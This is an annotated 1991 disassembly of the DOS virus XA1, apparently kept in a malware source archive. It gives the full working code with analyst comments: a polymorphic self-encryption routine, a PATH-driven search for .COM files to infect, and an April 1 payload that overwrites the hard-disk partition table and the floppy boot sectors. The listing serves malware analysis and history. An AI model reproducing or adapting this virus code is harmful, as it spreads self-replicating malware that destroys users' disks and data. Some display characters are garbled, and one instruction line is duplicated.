MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.xa1.lst

910 lines
30 KiB
Plaintext
Raw Normal View History

2021-01-13 00:07:35 +00:00
;==============================================
; Virus XA1 isolated in Poland in June 1991
;
; disassembled by Andrzej Kadlof July 1991
;
; (C) Polish Section of Virus Information Bank
;==============================================
; virus entry point
0100 EB07 jmp 0109
0102 56 0A 03 59 00 ; first 7 bytes forms virus signature
0107 2A 00 ; generation counter, never used (?)
; prepare stack for tricks
; stack usage:
; [BP + 2] cleared but not used
; [BP + 0] offset in block
; [BP - 2] low byte of size of decrypted part and encryption key
0109 0E push cs ; make free space on stack
010A E80000 call 010D ; put current offset on the stack
010D FA cli ; disable interrupt to safe stack
010E 8BEC mov bp,sp
0110 58 pop ax
0111 32C0 xor al,al
0113 894602 mov [bp+02],ax ; corrupt debbuger return address ??
0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt
; encrypt virus code, this routine is changed in different virus copies
011B B9CE05 mov cx,05CE ; length of decrypted block
011E B08C mov al,8C ; 8C is changed!
0120 8846FF mov [bp-01],al
0123 8B5E00 mov bx,[bp] ; current position in block
; ^^ changed, possible 3 wariants:
; ..5E.. mov bx,[bp] versions 0, 1, 2
; ..76.. mov si,[bp] versions 3, 4, 5
; ..7E.. mov di,[bp] versions 6, 7, 8
0126 884EFE mov [bp-02],cl ; low byte of counter
0129 8A4EFF mov cl,[bp-01] ; encrypt key
012C D207 rol byte ptr [bx],cl ; byte manipulation
; ^^^^ changed, possible 9 wariants:
; 000F add byte ptr [bx],cl version 0
; 300F xor byte ptr [bx],cl version 1
; D2O7 rol byte ptr [bx],cl version 2
; 000C add byte ptr [si],cl version 3
; 300C xor byte ptr [si],cl version 4
; D204 rol byte ptr [si],cl version 5
; 000D add byte ptr [di],cl version 6
; 300D xor byte ptr [di],cl version 7
; D205 rol byte ptr [di],cl version 8
012E EB00 jmp 0130 ; short pause
0130 43 inc bx ; position in block
; ^^ changed, possible 3 wariants:
; 43 inc bx version 0, 1, 2
; 46 inc si version 3, 4, 5
; 47 inc di version 6, 7, 8
0131 8A4EFE mov cl,[bp-02] ; restore block size
0134 E2F0 loop 0126 ; offset is decrypted!
; encrypted part
0136 FB sti
; get address of curent DTA and store it on the stack
0137 B42F mov ah,2F
0139 CD21 int 21
013B 06 push es
013C 53 push bx
; get keyboard status bits
013D 33C0 xor ax,ax
013F 8ED8 mov ds,ax
0141 A01704 mov al,[0417]
0144 2410 and al,10 ; extract scroll lock state
0146 50 push ax ; store
0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag
; restore DS
014C 8CC8 mov ax,cs
014E 8ED8 mov ds,ax
; intercepte INT 24h
0150 BAC606 mov dx,06C6
0153 B82425 mov ax,2524 ; set interrupt vector
0156 CD21 int 21
; search for PATH= in environment block
0158 A12C00 mov ax,[002C] ; segment of environment block
015B 8EC0 mov es,ax
015D 33FF xor di,di ; begin of environment block
015F FC cld
0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker
0164 741D je 0183 ; end fo block
0166 BE1B05 mov si,051B ; offset of string 'PATH='
0169 B90500 mov cx,0005 ; length of string
016C 8BC7 mov ax,di ; starting address
016E F3A6 rep cmpsb ; compare
0170 7411 je 0183 ; found
0172 8BF8 mov di,ax ; last starting point
0174 32C0 xor al,al
0176 B5FF mov ch,FF ; maximum block size
0178 F2AE repnz scasb
017A 74E4 je 0160
017C BF1A05 mov di,051A ; end of buffer for path
017F 8CC8 mov ax,cs ; restore ES
0181 8EC0 mov es,ax
0183 C706C1056205 mov word ptr [05C1],0562
; set local DTA
0189 BA3605 mov dx,0536
018C B41A mov ah,1A ; set DTA
018E CD21 int 21
0190 A1F906 mov ax,[06F9]
0193 A3F706 mov [06F7],ax
0196 A1FD06 mov ax,[06FD]
0199 A3FB06 mov [06FB],ax
019C B90500 mov cx,0005 ; counter of potential victims
019F BA1505 mov dx,0515 ; '*.COM', 0
01A2 06 push es
01A3 57 push di
01A4 51 push cx
01A5 8CC8 mov ax,cs
01A7 8EC0 mov es,ax
01A9 B9FFFF mov cx,FFFF ; all possible attributes
01AC B44E mov ah,4E ; find first
01AE EB06 jmp 01B6
01B0 59 pop cx ; restore counter
01B1 E35B jcxz 020E ; limit reached, check show/destruction
01B3 B44F mov ah,4F ; find next
01B5 51 push cx ; store counter
01B6 CD21 int 21
01B8 7203 jb 01BD ; continue
01BA E9F100 jmp 02AE
; restore address of path in environment block
01BD 59 pop cx
01BE 5F pop di
01BF 07 pop es
01C0 26803D00 cmp es:byte ptr [di],00 ; end of block?
01C4 744A je 0210 ; yes
; copy path to buffer
01C6 BB6205 mov bx,0562 ; offset of buffer
01C9 268A05 mov al,es:[di] ; next character
01CC 0AC0 or al,al ; end of block?
01CE 740A je 01DA ; yes
01D0 47 inc di
01D1 3C3B cmp al,3B ; ';', end of path?
01D3 7405 je 01DA ; yes
01D5 8807 mov [bx],al ; copy character
01D7 43 inc bx ; increase pointer
01D8 EBEF jmp 01C9 ; get next character
01DA 81FB6205 cmp bx,0562 ; buffer not empty?
01DE 74E0 je 01C0 ; empty
01E0 8A47FF mov al,[bx-01]
01E3 3C3A cmp al,3A ; ':', root directory
01E5 7408 je 01EF ; yes
01E7 3C5C cmp al,5C ; check last character, '\'
01E9 7404 je 01EF ; there is
01EB C6075C mov byte ptr [bx],5C ; add '\'
01EE 43 inc bx ; pointer to last character
01EF 06 push es
01F0 57 push di
01F1 51 push cx
01F2 891EC105 mov [05C1],bx ; store it
01F6 8BF3 mov si,bx
01F8 81EB6205 sub bx,0562 ; find path length
01FC 8BCB mov cx,bx
01FE BF1405 mov di,0514 ; destination buffer
0201 8CC8 mov ax,cs ; restore ES
0203 8EC0 mov es,ax
0205 4E dec si
0206 FD std
0207 F3A4 rep movsb ; copy
0209 8BD7 mov dx,di
020B 42 inc dx
020C EB97 jmp 01A5 ; find first
; end of infection proces, check condition for destruction/show
020E 58 pop ax ; balance stack
020F 58 pop ax
0210 8CC8 mov ax,cs ; restore ES
0212 8EC0 mov es,ax
; get date
0214 B42A mov ah,2A ; get date
0216 CD21 int 21
0218 81FA0104 cmp dx,0401 ; April 1?
021C 7533 jne 0251 ; no
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B:
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
; copy partition table to sector 11h of side 0, track 0
021E BA8000 mov dx,0080 ; first hard drive
0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table)
0224 BB0307 mov bx,0703 ; destroy victim code
0227 B80102 mov ax,0201 ; read 1 sector
022A 52 push dx
022B 51 push cx
022C 53 push bx
022D CD13 int 13 ; disk I/O
022F 5B pop bx
0230 59 pop cx
0231 5A pop dx
0232 B111 mov cl,11 ; new place for partition table
0234 B80103 mov ax,0301 ; write partition table
0237 CD13 int 13
; set and of sector marker in the buffer
0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker
; overwrite partition table
023F B280 mov dl,80
0241 E87404 call 06B8 ; write one sector to disk
; overwrite boot sector of drive A:
0244 32D2 xor dl,dl
0246 E86F04 call 06B8 ; write one sector do disk
; overwrite boot sector of drive B:
0249 B201 mov dl,01
024B E86A04 call 06B8 ; write disk
024E EB0A jmp 025A
0250 90 nop
; compare date
0251 81FA180C cmp dx,0C18 ; december 24?
0255 7203 jb 025A ; date earlier
;<><><><<><><><><><><><><><><><><><><><>
;
; CHRISTMAS SHOW
;
; see the description of subroutine 05D7
;<><><><><><><><><><><><><><><><><><><><><>
0257 E87D03 call 05D7 ; drow christmas tree
; make sound
025A E440 in al,40
025C 3CF8 cmp al,F8
025E 7206 jb 0266
0260 E461 in al,61
0262 0C03 or al,03
0264 E661 out 61,al
; restore the state of scroll lock flag
0266 33C0 xor ax,ax
0268 8ED8 mov ds,ax
026A 58 pop ax
026B 08061704 or [0417],al
; restore INT 24h
026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP
0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP
0279 B82425 mov ax,2524 ; set interrupt vector
027C CD21 int 21
; restore DTA
027E 5A pop dx
027F 1F pop ds
0280 B41A mov ah,1A ; set DTA
0282 CD21 int 21
; restore DS
0284 8CC8 mov ax,cs
0286 8ED8 mov ds,ax
0288 BEF006 mov si,06F0
028B 8B3EF706 mov di,[06F7]
028F 033EFB06 add di,[06FB]
0293 57 push di
0294 B90700 mov cx,0007
0297 FC cld
0298 F3A4 rep movsb
029A 33C0 xor ax,ax
029C 8BD8 mov bx,ax
029E 8BD0 mov dx,ax
02A0 8BE8 mov bp,ax
02A2 8B36F706 mov si,[06F7]
02A6 BF0001 mov di,0100
02A9 8B0EFB06 mov cx,[06FB]
02AD C3 ret
02AE BE5405 mov si,0554 ; file name in FCB
02B1 8B3EC105 mov di,[05C1] ; address of destination
02B5 B90D00 mov cx,000D ; length of asciiz string
02B8 FC cld
02B9 F3A4 rep movsb ; copy
02BB BF2005 mov di,0520 ; buffer for file name
02BE E8FA01 call 04BB ; copy
02C1 7503 jne 02C6
02C3 E9EAFE jmp 01B0 ; find next/destruct/show
02C6 BF2B05 mov di,052B
02C9 E8EF01 call 04BB ; copy file name
02CC 7503 jne 02D1
02CE E9DFFE jmp 01B0 ; find next/destruct/show
02D1 C606610500 mov byte ptr [0561],00
02D6 90 nop
02D7 F6064B0507 test byte ptr [054B],07 ; attribute byte in DTA
02DC 740F je 02ED ; hiden, system or read only, open file
02DE BA6205 mov dx,0562 ; file name
02E1 33C9 xor cx,cx ; clear all attributes
02E3 B80143 mov ax,4301 ; set file attributes
02E6 CD21 int 21
02E8 7303 jnb 02ED ; open file
02EA E9C3FE jmp 01B0 ; find next/destruct/show
02ED BA6205 mov dx,0562
02F0 B8023D mov ax,3D02 ; open file for read/write
02F3 CD21 int 21
02F5 8BD8 mov bx,ax ; handle
02F7 7303 jnb 02FC
02F9 E9B4FE jmp 01B0 ; find next
; check file size
02FC A15205 mov ax,[0552] ; high word of file size in DTA
02FF 0BC0 or ax,ax
0301 7403 je 0306 ; file below 64K
0303 E99001 jmp 0496 ; close file and find next
0306 A15005 mov ax,[0550] ; lower word of file size
0309 3D0700 cmp ax,0007 ; minimum file size
030C 72F5 jb 0303 ; close file and find next
030E 3D00F8 cmp ax,F800 ; maximum file size
0311 73F0 jnb 0303 ; close file and find next
; mayby already infected?
0313 8B16F706 mov dx,[06F7] ; form address of bufer
0317 0316FB06 add dx,[06FB]
031B B90700 mov cx,0007 ; number of bytes
031E 52 push dx
031F 51 push cx
0320 B43F mov ah,3F ; read file
0322 CD21 int 21
0324 59 pop cx
0325 5E pop si
0326 7208 jb 0330 ; read error, close and find next
; compare first 7 bytes with own code
0328 BF0001 mov di,0100 ; destination
032B FC cld
032C F3A6 rep cmpsb
032E 7503 jne 0333
0330 E96301 jmp 0496 ; close file and find next, (infected!)
; get and store file date and time
0333 B80057 mov ax,5700 ; get file time stamp
0336 CD21 int 21
0338 72F6 jb 0330 ; close file, find next
033A 89160107 mov [0701],dx ; store date
033E 890EFF06 mov [06FF],cx ; store time
0342 C606610501 mov byte ptr [0561],01
0347 90 nop
; check file size, if less than 603h bytes then append some garbage
0348 A15005 mov ax,[0550] ; file size
034B 3D0306 cmp ax,0603
034E 7321 jnb 0371
; file length is less than 603h, add some garbage
0350 33D2 xor dx,dx
0352 33C9 xor cx,cx
0354 B80242 mov ax,4202 ; move file ptr to EOF
0357 CD21 int 21
0359 7303 jnb 035E ; no errors, continue
035B E93801 jmp 0496 ; close file and find next
035E B90306 mov cx,0603 ; number of bytes
0361 2B0E5005 sub cx,[0550] ; file size
0365 B440 mov ah,40 ; write file
0367 CD21 int 21
0369 B80306 mov ax,0603 ; new file size
036C 7303 jnb 0371
036E E92501 jmp 0496 ; close file and find next
; now file is at least 603h bytes long
0371 FEC4 inc ah
0373 A3F906 mov [06F9],ax ; oryginal file size + 256
0376 A15005 mov ax,[0550] ; file size
0379 BE0306 mov si,0603 ; virus length
037C 33FF xor di,di
037E 3BC6 cmp ax,si
0380 7302 jnb 0384
0382 8BF0 mov si,ax
0384 8936FD06 mov [06FD],si
0388 8BD7 mov dx,di
038A 33C9 xor cx,cx
038C B80042 mov ax,4200 ; move file ptr to BOF
038F CD21 int 21
0391 7303 jnb 0396
0393 E90001 jmp 0496 ; close file and find next
0396 8B16F706 mov dx,[06F7]
039A 0316FB06 add dx,[06FB]
039E B90002 mov cx,0200
03A1 3BF1 cmp si,cx
03A3 7302 jnb 03A7
03A5 8BCE mov cx,si ; number of bytes
03A7 52 push dx
03A8 51 push cx
03A9 B43F mov ah,3F ; read file
03AB CD21 int 21
03AD 59 pop cx
03AE 5A pop dx
03AF 7303 jnb 03B4 ; continue
03B1 E9E200 jmp 0496 ; close file and find next
03B4 52 push dx
03B5 51 push cx
03B6 33D2 xor dx,dx
03B8 33C9 xor cx,cx
03BA B80242 mov ax,4202 ; move file ptr to EOF
03BD CD21 int 21
03BF 59 pop cx
03C0 5A pop dx
03C1 7303 jnb 03C6 ; continue
03C3 E9D000 jmp 0496 ; close file and find next
03C6 B440 mov ah,40 ; write file
03C8 CD21 int 21
03CA 7303 jnb 03CF
03CC E9C700 jmp 0496 ; close file and find next
03CF 81C70002 add di,0200
03D3 81EE0002 sub si,0200
03D7 7602 jbe 03DB
03D9 EBAD jmp 0388
03DB FF060701 inc word ptr [0107] ; infection counter
03DF 33D2 xor dx,dx
03E1 33C9 xor cx,cx
03E3 B80042 mov ax,4200 ; move file ptr to BOF
03E6 CD21 int 21
03E8 7303 jnb 03ED
03EA E9A900 jmp 0496 ; close file and find next
03ED 53 push bx ; store handle
03EE E440 in al,40
03F0 A807 test al,07
03F2 74FA je 03EE
03F4 A21F01 mov [011F],al ; change decryption key
; get random number from system timer count
03F7 33C0 xor ax,ax
03F9 8AF8 mov bh,al
03FB 8ED8 mov ds,ax
03FD A06C04 mov al,[046C] ; timer, low byte
0400 8CCA mov dx,cs ; restore DS
0402 8EDA mov ds,dx
; generate rundom number in BX in the range 0..8
0404 B103 mov cl,03
0406 F6F1 div cl ; AL <- AL/3, AH <- remainder
0408 8AEC mov ch,ah ; store remainder (0, 1 or 2)
040A 32E4 xor ah,ah ; prepare division
040C F6F1 div cl ; AL <- AL / 9, AH <- remainder
040E 8AC4 mov al,ah ; AL <- second remainder
0410 02C0 add al,al ; *2, AL in [0..4]
0412 02C4 add al,ah ; *3, AL in [0..6]
0414 02C5 add al,ch ; first remainder
0416 8AD8 mov bl,al ; BL in [0..8]
; multiply BX by 4 (table entry size)
0418 03DB add bx,bx
041A 03DB add bx,bx
041C 81C3C906 add bx,06C9 ; offset of table
; modify encryption routine (automodyfication)
0420 8A07 mov al,[bx]
0422 A22401 mov [0124],al ; 3 versions 5E/76/7E
0425 8B4701 mov ax,[bx+01]
0428 A32C01 mov [012C],ax ; 9 wersions
042B 8A4703 mov al,[bx+03] ; 3 versions
042E A23001 mov [0130],al
0431 8AC5 mov al,ch
; prepare decrypt routine
0433 BBED06 mov bx,06ED
0436 D7 xlat
0437 A26104 mov [0461],al ; modify decryption routine
; write new encryption routine to file
043A 5B pop bx ; restore handle
043B BA0001 mov dx,0100 ; begin of file
043E B93500 mov cx,0035 ; block size
0441 B440 mov ah,40 ; write file
0443 CD21 int 21
0445 724F jb 0496 ; close file and find next
; decryption routine
0447 BE3501 mov si,0135 ; start of decrypted block
044A B9CE05 mov cx,05CE ; size of decrypted block
044D 53 push bx ; store handle
044E 51 push cx
044F B80002 mov ax,0200
0452 8B1EF706 mov bx,[06F7]
0456 031EFB06 add bx,[06FB]
045A 53 push bx
045B 8A0E1F01 mov cl,[011F] ; decription key
045F 8A2C mov ch,[si]
0461 D2CD ror ch,cl ; <-- changed (3 variants)
; ^^ changed byte, possible wariants:
; 28CD sub ch,cl versions: 0, 3, 6
; 30CD xor ch,cl versions: 1, 4, 7
; D2CD ror ch,cl versions: 2, 5, 8
0463 882F mov [bx],ch
0465 43 inc bx
0466 46 inc si
0467 48 dec ax
0468 75F5 jne 045F
046A 5A pop dx
046B 59 pop cx
046C 5B pop bx
046D 51 push cx
046E 81F90102 cmp cx,0201
0472 7203 jb 0477
0474 B90002 mov cx,0200
0477 B440 mov ah,40 ; write file
0479 CD21 int 21
047B 59 pop cx
047C 7218 jb 0496 ; close file and find next
047E 81E90002 sub cx,0200
0482 77C9 ja 044D
; restore file time stamp
0484 8B160107 mov dx,[0701] ; file date
0488 8B0EFF06 mov cx,[06FF] ; file time
048C B80157 mov ax,5701 ; set file time stamp
048F CD21 int 21
0491 7203 jb 0496 ; close file and find next
; decrease counter on the stack
0493 59 pop cx
0494 49 dec cx
0495 51 push cx
0496 B43E mov ah,3E ; close file
0498 CD21 int 21
049A 8A0E4B05 mov cl,[054B] ; attributes
049E FE0E6105 dec byte ptr [0561]
04A2 7405 je 04A9
04A4 F6C107 test cl,07 ; hidden, system, read only
04A7 740F je 04B8
04A9 80F920 cmp cl,20 ; archive
04AC 740A je 04B8
04AE BA6205 mov dx,0562 ; file name
04B1 32ED xor ch,ch
04B3 B80143 mov ax,4301 ; set file attributes
04B6 CD21 int 21
04B8 E9F5FC jmp 01B0 ; find next
;----------------------------------------
; move 11 bytes do DS:DI ('C:\COMMAND.')
04BB BE6205 mov si,0562
04BE B90B00 mov cx,000B
04C1 FC cld
04C2 F3A6 rep cmpsb
04C4 C3 ret
; buffer for path
04C5 30 31 32 33 34 35 36 37 01234567
04CD 38 39 30 31 32 33 34 35 89012345
04D5 36 37 38 39 30 31 32 33 67890123
04DD 34 35 36 37 38 39 30 31 45678901
04E5 32 33 34 35 36 37 38 39 23456789
04ED 30 31 32 33 34 35 36 37 01234567
04F5 38 39 30 31 32 33 34 35 89012345
04FD 36 37 38 43 3A 5C 4A 45 678C:\JE
0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P
050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\
; paterns for search
0515 2A 2E 43 4F 4D 00 50 41 *.COM PA
051D 54 48 3D TH=
; buffers for file names
0520 49 42 4D 42 49 IBMBI
0525 4F 2E 43 4F 4D 00 O.COM
052B 49 42 IB
052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM
0535 00
; local DTA
0536 03 3F 3F 3F 3F 3F 3F ;\
053D 3F 3F 43 4F 4D FF 02 00 ; | reserved
0545 00 00 00 00 00 00 ;/
054B 20 ; file attribute
054C 00 60 71 0E ; file time stamp
0550 DB 62 00 00 ; file size
0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0)
0561 01 ; flag: attributes are changed
0562 43 3A 5C C:\
0565 43 4F 4D 4D 41 4E 44 2E COMMAND.
056D 43 4F 4D 00 00 4D 00 00 COM M
0575 00 2E 43 4F 4D 00 4F 68 .COM Oh
057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo!
0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN
058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O
0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo
059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh
05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo!
05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN
05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O
05BD 68 4E 6F 21 hNo!
05C1 65 05 ;
;---------------------------------------
; write character (or space) cx times
05C3 B020 mov al,20
05C5 50 push ax
05C6 E89E00 call 0667 ; write character
05C9 58 pop ax
05CA E2F9 loop 05C5
05CC C3 ret
;-------------
; next line
05CD B00D mov al,0D
05CF E89500 call 0667 ; write character
05D2 B00A mov al,0A
05D4 E99000 jmp 0667 ; write character
;------------------------------
; drow christmast tree
;
; result will look like this:
;
;
; <20>
; ***
; *****
; *******
; *********
; ***********
; *************
; ***************
; *****************
; *******************
; *********************
; ***********************
; *************************
; ***************************
; *****************************
; <20><><EFBFBD>
; <20><><EFBFBD>
; <20><><EFBFBD>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; Und er lebt doch noch : Der Tannenbaum !
; Frohe Weihnachten ...
;
05D7 B92700 mov cx,0027
05DA E8E6FF call 05C3 ; clear 39 characters
05DD B0AD mov al,AD ; '<27>'
05DF E88500 call 0667 ; write character
05E2 E8E8FF call 05CD ; new line
05E5 BB0300 mov bx,0003
05E8 BA2600 mov dx,0026
05EB 8BCA mov cx,dx
05ED E8D3FF call 05C3 ; write CX spaces
05F0 8BCB mov cx,bx
05F2 B02A mov al,2A ; '*'
05F4 E8CEFF call 05C5 ; write CX characters
05F7 E8D3FF call 05CD ; new line
05FA 4A dec dx
05FB 83C302 add bx,0002
05FE 83FB1F cmp bx,001F
0601 75E8 jne 05EB
0603 BB0300 mov bx,0003
0606 B92600 mov cx,0026
0609 E8B7FF call 05C3 ; write CX spaces
060C B90300 mov cx,0003
060F B0DB mov al,DB ; '<27>'
0611 E8B1FF call 05C5 ; write CX characters
0614 E8B6FF call 05CD ; next line
0617 4B dec bx
0618 75EC jne 0606
061A B95000 mov cx,0050 ; full line
061D B0CD mov al,CD ; '<27>'
061F E8A3FF call 05C5 ; write character CX times
0622 B91300 mov cx,0013
0625 E89BFF call 05C3 ; write CX spaces
0628 BB7406 mov bx,0674 ; string: Und er lebt doch ...
062B E82C00 call 065A ; write string
062E B91D00 mov cx,001D
0631 E88FFF call 05C3 ; clear part of line
0634 EB24 jmp 065A ; write asciiz string pointed by BX
0636 90 nop
0637 E80000 call 063A
063A 5B pop bx
063B 83C30D add bx,000D
063E 8CC8 mov ax,cs
0640 8ED8 mov ds,ax
0642 E81500 call 065A ; write string
0645 EBFE jmp 0645 ; hang CPU
0647 41 70 72 69 6C 2C 20 41 April, A
064F 70 72 69 6C 20 2E 2E 2E pril ...
0657 20 07 00
;-----------------------------------
; write asciiz string pointed by BX
065A 8A07 mov al,[bx] ; get character
065C 43 inc bx ; next character
065D 0AC0 or al,al ; and of string?
065F 7405 je 0666 ; yes, RET
0661 E80300 call 0667 ; write character
0664 EBF4 jmp 065A ; get next character
0666 C3 ret
;--------------------
; write character TTL
0667 52 push dx
0668 51 push cx
0669 53 push bx
066A 32FF xor bh,bh
066C B40E mov ah,0E
066E CD10 int 10
0670 5B pop bx
0671 59 pop cx
0671 59 pop cx
0672 5A pop dx
0673 C3 ret
0674 55 6E 64 20 65 72 20 6C Und er l
067C 65 62 74 20 64 6F 63 68 ebt doch
0684 20 6E 6F 63 68 20 3A 20 noch :
068C 44 65 72 20 54 61 6E 6E Der Tann
0694 65 6E 62 61 75 6D 20 21 enbaum !
069C 0D 0A 00 46 72 6F 68 65 Frohe
06A4 20 57 65 69 68 6E 61 63 Weihnac
06AC 68 74 65 6E 20 2E 2E 2E hten ...
06B4 0D 0A 07 00
;------------------------------------------
; write one sector to disk specified in DL
; track 9, side 0 sector 1
06B8 32F6 xor dh,dh
06BA B90100 mov cx,0001
06BD BB3706 mov bx,0637
06C0 B80103 mov ax,0301
06C3 CD13 int 13
06C5 C3 ret
;==================
; INT 24h handler
06C6 B000 mov al,00
06C8 CF iret
; table of bytes for changing encrypt routine
06C9 5E 00 0F 43
06CD 5E 30 0F 43
06D1 5E D2 07 43
06D5 76 00 0C 46
06D9 76 30 0C 46
06DD 76 D2 04 46
06E1 7E 00 0D 47
06E5 7E 30 0D 47
06E9 7E D2 05 47
; table for variants of decrypt routine
06ED 28 30 D2
; part of victime code
06F0 F3A4 rep movsb
06F2 8BF1 mov si,cx
06F4 8BF9 mov di,cx
06F6 C3 ret
06F7 0307 ; offset of buffer/modified code
06F9 DB63 ; file size + 256
06FB C603 ;
06FD 0306 ;
06FF 0060 ; file date
0701 710E ; file time